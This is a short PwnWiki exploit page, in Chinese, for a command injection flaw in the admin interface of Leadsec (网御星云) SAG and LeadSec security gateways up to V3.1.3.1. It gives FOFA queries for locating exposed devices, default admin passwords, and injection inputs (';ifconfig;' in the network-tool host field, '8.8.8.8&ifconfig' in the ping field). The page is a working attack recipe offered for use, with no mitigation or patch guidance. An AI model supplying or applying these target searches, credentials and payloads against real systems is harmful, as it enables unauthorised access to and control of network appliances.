网御星云-安全网关SAG系列&LeadSec系列 后台命令执行漏洞

From PwnWiki
This page is a translated version of the page 網禦星雲-安全網關SAG系列&LeadSec系列 後台命令執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

漏洞影响

网御星云安全网关SAG系列和LeadSec系列<=V3.1.3.1版本

FOFA

icon_hash="-948153991"

弱口令

administrator
administrator

漏洞利用

漏洞点位于: 网关管理->网络工具,在目的主机处填写: 

;ifconfig;

网御星云安全网关系列

FOFA

title="网御 安全网关"

弱口令

administrator
leadsec@7766

漏洞利用

漏洞点位于: 状态监控->网络测试->ping处输入: 

8.8.8.8&ifconfig

参考

https://mp.weixin.qq.com/s/YLgAZAO40PY8gX6Fh8D15w

Retrieved from "https://pwnwiki.com/index.php?title=網禦星雲-安全網關SAG系列%26LeadSec系列_後台命令執行漏洞/zh-cn&oldid=4283"